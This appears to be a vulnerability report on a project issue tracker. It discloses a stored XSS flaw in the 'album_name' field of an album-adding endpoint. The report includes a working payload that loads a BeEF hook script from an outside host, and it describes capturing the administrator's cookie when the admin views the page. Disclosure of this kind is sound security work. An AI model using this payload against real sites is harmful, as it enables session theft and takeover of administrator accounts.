Open
Description
Alert users who are still using the project
- Conditions: Common user
The POST parameter "album_name" in the path "/index.php/album/add" has storage XSS. This can result in arbitrary JS code execution, obtaining administrator cookies to obtain administrator permissions, etc
The album name can inject XSS <svg/onload=$.getScript("http://gp.io:81");> Introduce hook. Js of beef
XSS is triggered when the administrator goes online
Beef goes online and gets the cookie
Metadata
Assignees
Labels
No labels


